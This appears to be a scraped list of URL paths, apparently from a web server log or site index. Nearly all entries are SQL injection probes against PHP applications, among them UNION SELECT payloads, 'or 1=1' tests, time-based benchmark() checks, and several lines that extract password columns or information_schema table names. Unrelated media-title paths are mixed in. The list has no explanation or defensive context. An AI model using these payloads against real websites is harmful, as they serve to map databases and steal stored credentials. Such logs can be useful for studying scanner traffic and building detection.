/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331908730,1,1,1,1,1,1,1--&blogid=1

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,512612977),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/cgi-bin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331919223,1,795710224--

/cgi-bin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331923205,1,131076807--

/main.php?stuff=1985387140 and 1=1

/iron maiden - bonus cd 1 and 2/

/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 2020390524,2,880987929,4,5,6,7,8,9,0,1,2,3 --

/examples/jsp/cal/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1114106,2,907689688,4,5,6,7,8,9,0,1,2,3 --

/examples/jsp/num/forum.php3?id_article=1&id_forum=-1/**/union/**/select 225310072--

/examples/jsp/num/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904462,4,5

/examples/jsp/checkbox/forum.php?forum=-1 union select null,123456,null,null,null,null--

/cgi-bin/spt--forumtopics.php?forumid=-9 union select null,null,null,1331908887,4,5

/cgi-bin/index.php?act=sm_window&page=event&day=-1 union select 1,1331919215,1990011133 --

/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904439

/cgi-bin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1974863202,2,2009798962,4,5,6,7,8,9,0,1,2,3 --

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332008331,0x3a,892071098),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/cgi-bin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 362784712,2,1572590489,4,5,6,7,8,9,0,1,2,3 --

/examples/jsp/error/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,720432920543,4,5,6,7,8,9,10,11--

/cgi-bin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1888332686--

/spiderman 1 and 2 dvd rips[eng]xvid/

/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331919003,1,1,1,1,1,1,1--&blogid=1

/examples/jsp/jsp2/jspx/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,941315700 --

/examples/jsp/num/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,470960381--

/examples/jsp/checkbox/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,573614927975,4,5,6,7,8,9,10,11--

/cgi-bin/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,723399913286,4,5,6,7,8,9,10,11--

/forum.php?id_article=1&id_forum=-1/**/union/**/select 1989628049--

/index.php?act=sm_window&page=event&day=-1 union select 1,1331923203,932914702 --

/www/delivery/ac.php?bannerid=-94+or+1=1

/en-us/account/spt--forumtopics.php?forumid=-9 union select null,null,null,1331905234,4,5

/phpmyadmin/event_view.php?eid=34 union select 356336320

/examples/jsp/num/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,1134427173 --

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331908854,0x3a,1781864537),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/examples/servlets/servlet/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,1415329595 --

/examples/jsp/colors/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,093611555975,4,5,6,7,8,9,10,11--

/cgi-bin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 854943738,2,566710091,4,5,6,7,8,9,0,1,2,3 --

/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,184920009168,4,5,6,7,8,9,10,11--

/phpmyadmin/documentation.html? or 1=1-- =1

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332009306,0x3a,1514709258),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/recordings/event_view.php?eid=34 union select 123922933

/cgi-bin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 454860451--

/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,203712303,473923447,1,1,1,1,1--&blogid=1

/recordings/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331919003,1,1,1,1,1,1,1--&blogid=1

/examples/servlets/servlet/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1161517009,2,1674610116,4,5,6,7,8,9,0,1,2,3 --

/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331908862,1,1,1,1,1,1,1--&blogid=1

/examples/servlets/servlet/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904438

/examples/jsp/cal/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,504398662),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/cacti/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331909358

/phpmyadmin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1161517009,2,1674610116,4,5,6,7,8,9,0,1,2,3 --

/manager/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/manager/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,311692537,1573465944,1,1,1,1,1--&blogid=1

/phpmyadmin/disp_album.php?id_album=0+or+1=1

/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1332010398

/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,051041522030,4,5,6,7,8,9,10,11--

/examples/jsp/colors/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/examples/jsp/error/forum.php3?id_article=1&id_forum=-1/**/union/**/select 389315682--

/examples/jsp/sessions/event_view.php?eid=34 union select 1019615284

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332010397,0x3a,1301577513),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/examples/jsp/colors/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904438

/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331909359

/cgi-bin/forum.php?id_article=1&id_forum=-1/**/union/**/select 943220493--

/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,087618615219,4,5,6,7,8,9,10,11--

/phpmyadmin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1861599594--

/cgi-bin/forum.php?id_article=1&id_forum=-1/**/union/**/select 681295219--

/cgi-bin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 827928565--

/cgi-bin/event_view.php?eid=34 union select 664124901

/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,706187344943,4,5,6,7,8,9,10,11--

/gokusen 2 ep 1 and 2/

/cgi-bin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 996551295,2,294567145,4,5,6,7,8,9,0,1,2,3 --

/examples/jsp/jsp2/el/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,2005025687--

/recordings/disp_album.php?id_album=0+or+1=1

/examples/jsp/colors/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904442,1,1,1,1,1,1,1--&blogid=1

/phpmyadmin/forum.php?id_article=1&id_forum=-1/**/union/**/select 1867312047--

/phpmyadmin/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904462,4,5

/examples/jsp/error/forum.php?forum=-1 union select null,123456,null,null,null,null--

/cgi-bin/forum.php?id_article=1&id_forum=-1/**/union/**/select 1901176396--

/cgi-bin/forum.php?id_article=1&id_forum=-1/**/union/**/select 855948055--

/examples/jsp/error/event_view.php?eid=34 union select 174044993

/top.php?stuff=1417058040 and 1=1

/phpmyadmin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331923200,0x3a,196871378),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/cgi-bin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1332009308,1,1919064263--

/cgi-bin/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904439

/cacti/www/delivery/ac.php?bannerid=-63+or+1=1

/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331905170

/cgi-bin/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331908857

/cgi-bin/event_view.php?eid=34 union select 1565141044

/manager/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1161517009,2,1674610116,4,5,6,7,8,9,0,1,2,3 --

/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331923201

/cgi-bin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1542070421--

/index.php?act=sm_window&page=event&day=-1 union select 1,1331919215,1201912380 --

/www/delivery/ac.php?bannerid=-715+or+1=1

/en-us/account/www/delivery/ac.php?bannerid=-670+or+1=1

/french revolution parts 1 and 2/

/and 1 streetball_information/

/examples/jsp/sessions/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1161517009,2,1674610116,4,5,6,7,8,9,0,1,2,3 --

/examples/jsp/num/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,203712303,473923447,1,1,1,1,1--&blogid=1

/cgi-bin/forum.php?id_article=1&id_forum=-1/**/union/**/select 732112326--

/examples/jsp/num/disp_album.php?id_album=0+or+1=1

/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1332008335,1,1357928740--

/cgi-bin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1990709357,1464629176,1,1,1,1,1--&blogid=1

/examples/jsp/jsp2/el/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904442,1,1,1,1,1,1,1--&blogid=1

/examples/jsp/jsp2/jspx/forum.php3?id_article=1&id_forum=-1/**/union/**/select 976128779--

/www/delivery/ac.php?bannerid=-216+or+1=1

/cgi-bin/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1332010398

/cgi-bin/event_view.php?eid=34 union select 1040810204

/phpmyadmin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1974863202,2,2009798962,4,5,6,7,8,9,0,1,2,3 --

/examples/jsp/checkbox/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1581609357--

/recordings/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331919001

/examples/jsp/colors/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,107307299 --

/examples/jsp/num/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904464,4,5

/cgi-bin/www/delivery/ac.php?bannerid=-856+or+1=1

/examples/jsp/error/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/examples/jsp/error/forum.php?id_article=1&id_forum=-1/**/union/**/select 944993063--

/cgi-bin/event_view.php?eid=34 union select 2020114481

/forum.php3?id_article=1&id_forum=-1/**/union/**/select 393761585--

/forum.php?id_article=1&id_forum=-1/**/union/**/select 1337333975--

/angry kid season 1 and 2 complete 3gp format/

/examples/jsp/colors/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,203712303,473923447,1,1,1,1,1--&blogid=1

/cgi-bin/event_view.php?eid=34 union select 1880732197

/examples/jsp/num/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1161517009,2,1674610116,4,5,6,7,8,9,0,1,2,3 --

/manager/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904438

/cgi-bin/www/delivery/ac.php?bannerid=-530+or+1=1

/examples/jsp/sessions/forum.php?id_article=1&id_forum=-1/**/union/**/select 257075023--

/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904228

/digital camera world - all 2002 and 2003 issues/

/index.php?cmd=6&recid=1 order by 20

/cgi-bin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 435389080,2,2084643622,4,5,6,7,8,9,0,1,2,3 --

/cgi-bin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 76752379--

/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1305074935,281030825,1,1,1,1,1--&blogid=1

/spt--forumtopics.php?forumid=-9 union select null,null,null,1332010419,4,5

/examples/jsp/jsp2/jspx/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,203712303,473923447,1,1,1,1,1--&blogid=1

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/cgi-bin/www/delivery/ac.php?bannerid=-564+or+1=1

/examples/servlets/servlet/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904439

/cgi-bin/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331908862,1,1,1,1,1,1,1--&blogid=1

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,512612977),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/phpmyadmin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331923205,1,1882566014--

/cacti/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,347459344023,4,5,6,7,8,9,10,11--

/examples/jsp/num/forum.php?id_article=1&id_forum=-1/**/union/**/select 798505850--

/phpmyadmin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,416276020,64888377,1,1,1,1,1--&blogid=1

/main.php?logout=(85743-benchmark(1,0x53454c454354204e554c4c)+87315)

/cgi-bin/spt--forumtopics.php?forumid=-9 union select null,null,null,1331905234,4,5

/examples/jsp/cal/forum.php?forum=-1 union select null,123456,null,null,null,null--

/www/delivery/ac.php?bannerid=-111+or+1=1

/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1332009308,1,138283193--

/ei99-benchmark/

/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331908857

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332008331,0x3a,892071098),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/cgi-bin/index.php?act=sm_window&page=event&day=-1 union select 1,1332009307,1198085353 --

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919000,0x3a,576275653),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/examples/servlets/servlet/www/delivery/ac.php?bannerid=-661+or+1=1

/email-benchmark/

/cgi-bin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331919223,1,1562489379--

/forum.php?id_article=1&id_forum=-1/**/union/**/select 1107672760--

/cgi-bin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 846061434,2,198865279,4,5,6,7,8,9,0,1,2,3 --

/index.php?readold=999 union select 1,password,3,4,name,6 from eronated_table_name/*

/forum.php?id_article=1&id_forum=-1/**/union/**/select 537524279--

/examples/jsp/error/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,041990139546,4,5,6,7,8,9,10,11--

/phpmyadmin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 754539307--

/cgi-bin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331905232,1,1910022921--

/cgi-bin/www/delivery/ac.php?bannerid=-241+or+1=1

/examples/servlets/servlet/disp_album.php?id_album=0+or+1=1

/gunbound and 306 patch/

/cgi-bin/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331919003,1,1,1,1,1,1,1--&blogid=1

/examples/jsp/cal/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,311692537,1573465944,1,1,1,1,1--&blogid=1

/cgi-bin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,421684559,1012165790,1,1,1,1,1--&blogid=1

/examples/jsp/cal/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,1019076408 --

/event_view.php?eid=34 union select 374573838

/cgi-bin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1770913475--

/index.php?mode=forums&forumid=1 union select * from force_error

/examples/jsp/jsp2/el/event_view.php?eid=34 union select 1150184776

/cgi-bin/forum.php?id_article=1&id_forum=-1/**/union/**/select 2092788719--

/en-us/account/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331905232,1,1095564249--

/jack or 100 ways to barbecue v1/

/forum.php?id_article=1&id_forum=-1/**/union/**/select 1179984801--

/cgi-bin/www/delivery/ac.php?bannerid=-727+or+1=1

/examples/jsp/checkbox/index.php?act=sm_window&page=event&day=-1 union select 1,1331904453,308598463 --

/main.php?stuff=(73439-benchmark(1,0x53454c454354204e554c4c)+38286)

/windowblinds 5 and 60 skins/

/spt--forumtopics.php?forumid=-9 union select null,null,null,1332008335,4,5

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331908854,0x3a,1781864537),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/manager/forum.php?id_article=1&id_forum=-1/**/union/**/select 549027070--

/event_view.php?eid=34 union select 525725730

/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331923205,1,773849992--

/love hina - hinata girls song best 1 and 2 albums/

/examples/servlets/servlet/event_view.php?eid=34 union select 1235563020

/benchmark-stopwatch/

/cgi-bin/index.php?act=sm_window&page=event&day=-1 union select 1,1332010400,1265038966 --

/examples/jsp/jsp2/el/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904439

/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,624239340749,4,5,6,7,8,9,10,11--

/phpmyadmin/forum.php?id_article=1&id_forum=-1/**/union/**/select 2079135162--

/bbc survivors  3x09 and 3x10/

/elvis - amazing grace  1 and 2/

/event_view.php?eid=34 union select 138464041

/cacti/spt--forumtopics.php?forumid=-9 union select null,null,null,1331905234,4,5

/main.php?logout=(75122-benchmark(1,0x53454c454354204e554c4c)+62965)

/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331905232,1,1851103787--

/examples/jsp/jsp2/jspx/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,858127810073,4,5,6,7,8,9,10,11--

/forum.php3?id_article=1&id_forum=-1/**/union/**/select 933668912--

/top.php?stuff=(1-(select null from (select null) t where 0x49347269414f4a6e=0x49347269414f4a6e))

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332010397,0x3a,1301577513),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/cacti/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 846061434,2,198865279,4,5,6,7,8,9,0,1,2,3 --

/priest holmes highlights - 2003 and 2004/

/examples/jsp/jsp2/el/forum.php3?id_article=1&id_forum=-1/**/union/**/select 574705390--

/examples/jsp/checkbox/event_view.php?eid=34 union select 400893711

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331908728,0x3a,1791311072),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/cgi-bin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1332010419,1,912797649--

/examples/jsp/error/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904442,1,1,1,1,1,1,1--&blogid=1

/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 760871658,2,576927904,4,5,6,7,8,9,0,1,2,3 --

/en-us/account/event_view.php?eid=34 union select 521469226

/examples/jsp/num/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/manager/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,235177938969,4,5,6,7,8,9,10,11--

/recordings/spt--forumtopics.php?forumid=-9 union select null,null,null,1331919012,4,5

/cgi-bin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,653954551,528677520,1,1,1,1,1--&blogid=1

/examples/jsp/sessions/www/delivery/ac.php?bannerid=-338+or+1=1

/phpmyadmin/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331923201,1,1,1,1,1,1,1--&blogid=1

/examples/jsp/error/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904439

/examples/jsp/cal/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/examples/servlets/servlet/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904464,4,5

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331908728,0x3a,1791311072),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/cgi-bin/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331923201,1,1,1,1,1,1,1--&blogid=1

/examples/servlets/servlet/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,2053819050 --

/forum.php?id_article=1&id_forum=-1/**/union/**/select 2097790589--

/spt--forumtopics.php?forumid=-9 union select null,null,null,1331919224,4,5

/phpmyadmin/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331904442,1,1,1,1,1,1,1--&blogid=1

/cgi-bin/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,079007340743,4,5,6,7,8,9,10,11--

/cgi-bin/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331905182,1,1,1,1,1,1,1--&blogid=1

/examples/jsp/jsp2/el/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,1723953262 --

/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1191619516--

/en-us/account/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331905166,0x3a,1536152654),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/vtc collection part 2 or 8/

/examples/jsp/jsp2/jspx/forum.php?id_article=1&id_forum=-1/**/union/**/select 1919245949--

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331905166,0x3a,1536152654),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/cgi-bin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,1480204165,1632363387,1,1,1,1,1--&blogid=1

/examples/jsp/sessions/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,203712303,473923447,1,1,1,1,1--&blogid=1

/examples/jsp/cal/forum.php?id_article=1&id_forum=-1/**/union/**/select 1547690388--

/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 500066955,2,800036118,4,5,6,7,8,9,0,1,2,3 --

/forum.php?forum=-1 union select password,password,null,null from test_mysql_injection where uid=1/*

/cgi-bin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,776831339,588291065,1,1,1,1,1--&blogid=1

/top.php?stuff=(95975-benchmark(1,0x53454c454354204e554c4c)+52675)

/main.php?stuff=(65911-benchmark(1,0x53454c454354204e554c4c)+34087)

/cgi-bin/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,670106271746,4,5,6,7,8,9,10,11--

/index.php?act=sm_window&page=event&day=-1 union select 1,1332009307,1357321118 --

/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1461801666,2,718923871,4,5,6,7,8,9,0,1,2,3 --

/phpmyadmin/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,2142607554--

/cgi-bin/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1332008331

/examples/jsp/checkbox/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904462,4,5

/index.php?act=sm_window&page=event&day=-1 union select 1,1331919215,227102177 --

/post.php?postid=-1 or 0=1

/cgi-bin/spt--forumtopics.php?forumid=-9 union select null,null,null,1332008335,4,5

/cgi-bin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 288034688--

/examples/jsp/sessions/index.php?act=sm_window&page=event&day=-1 union select 1,1331904453,1918936182 --

/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 911180970,2,397451365,4,5,6,7,8,9,0,1,2,3 --

/ratchet and clank 2 and 3/

/examples/jsp/jsp2/jspx/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,1216266359 --

/benchmark-charts/

/examples/servlets/servlet/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1907913774--

/cgi-bin/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,783842630348,4,5,6,7,8,9,10,11--

/examples/jsp/error/forum.php?id_article=1&id_forum=-1/**/union/**/select 585126122--

/examples/jsp/colors/forum.php?forum=-1 union select null,123456,null,null,null,null--

/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331908887,1,1902131964--

/?p4yl04d2=1 union all select 1,2,3,table_name from information_schema.tables

/benchmark capital/

/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1332008332,1,1,1,1,1,1,1--&blogid=1

/cgi-bin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,203712303,473923447,1,1,1,1,1--&blogid=1

/cgi-bin/spt--forumtopics.php?forumid=-9 union select null,null,null,1331919012,4,5

/vtc collection part 4 or 8/

/examples/jsp/sessions/www/delivery/ac.php?bannerid=-417+or+1=1

/cacti/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331909370,1,1,1,1,1,1,1--&blogid=1

/xsql/demo/adhocsql/query.xsql?sql=select username from all_users

/christmas cartoon classics 70s 80s and 90s/

/examples/jsp/sessions/forum.php?forum=-1 union select null,123456,null,null,null,null--

/examples/jsp/checkbox/forum.php?id_article=1&id_forum=-1/**/union/**/select 553484972--

/examples/jsp/jsp2/jspx/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904437,0x3a,577347075),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331904227,0x3a,1244506787),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/manager/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1114106,2,907689688,4,5,6,7,8,9,0,1,2,3 --

/examples/jsp/checkbox/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,203712303,473923447,1,1,1,1,1--&blogid=1

/cgi-bin/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,266652800,1186686792,1,1,1,1,1--&blogid=1

/examples/jsp/sessions/forum.php?id_article=1&id_forum=-1/**/union/**/select 933723210--

/examples/jsp/checkbox/spt--forumtopics.php?forumid=-9 union select null,null,null,1331904464,4,5

/examples/servlets/servlet/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,1412767513--

/eps 11 and 12/

/cgi-bin/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332009306,0x3a,1514709258),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/examples/jsp/error/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1114106,2,907689688,4,5,6,7,8,9,0,1,2,3 --

/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1332010398,1,1,1,1,1,1,1--&blogid=1

/cgi-bin/forum.php?id_article=1&id_forum=-1/**/union/**/select 1821172893--

/examples/jsp/jsp2/jspx/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331904462,1,27670983--

/index.php?act=sm_window&page=event&day=-1 union select 1,1331904452,866216774 --

/modules/tinymce/content_css.php?templateid=-1/**/union/**/select/**/1331908740,1,584740072--

/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331923201,1,1,1,1,1,1,1--&blogid=1

/phpmyadmin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 1114106,2,907689688,4,5,6,7,8,9,0,1,2,3 --

/examples/jsp/colors/cal_cat.php?op=cats&year=2008&catview=1+union+select+1,1331904439

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331908728,0x3a,1791311072),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1618324295--

/benchmark-software/

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331919200,0x3a,512612977),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/phpmyadmin/spt--forumtopics.php?forumid=-9 union select null,null,null,1331923205,4,5

/event_view.php?eid=34 union select 375372346

/forum.php3?id_article=1&id_forum=-1/**/union/**/select 1629494070--

/cgi-bin/forum.php3?id_article=1&id_forum=-1/**/union/**/select 89413927--

/lizzie mcguire ep 5 and 6/

/examples/jsp/checkbox/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,311692537,1573465944,1,1,1,1,1--&blogid=1

/plugins/calendar/calendar_backend.php?pageec=dayview&month=2&year=-1+or+1=testmyiosofteasycalendar40sqlinjection

/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1332010411,0x3a,1017948332),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20

/forum.php?id_article=1&id_forum=-1/**/union/**/select 1741136716--

/cacti/index.php?go=detail&id=-99999/**/union/**/select/**/0,1,concat(1331909354,0x3a,1639211458),3,4,5,6,7,8,9,10,11,12,13,14,15,16

/getnewsitem.php?newsid=999/**/union/**/select/**/1,1122334455,5544332211,135,2/*

/cgi-bin/index.php?op=viewarticle&articleid=9999/**/union/**/select/**/1331909370,1,1,1,1,1,1,1--&blogid=1

/cgi-bin/ajax.php?rs=__exp__getfeedcontent&rsargs[]=-99 union select 500066955,2,800036118,4,5,6,7,8,9,0,1,2,3 --

/manager/index.php?op=viewalbum&albumid=-1/**/union/**/select/**/0,1,203712303,473923447,1,1,1,1,1--&blogid=1

/examples/jsp/num/index.php?option=weblinks&itemid=2&catid=-1 union select 0,1,2,648615693724,4,5,6,7,8,9,10,11--

/cgi-bin/forum.php?forum=-1 union select null,123456,null,null,null,null--

/recordings/index.php?act=sm_window&page=event&day=-1 union select 1,1331919007,232958530 --

/forum.php?id_article=1&id_forum=-1/**/union/**/select 848905248--

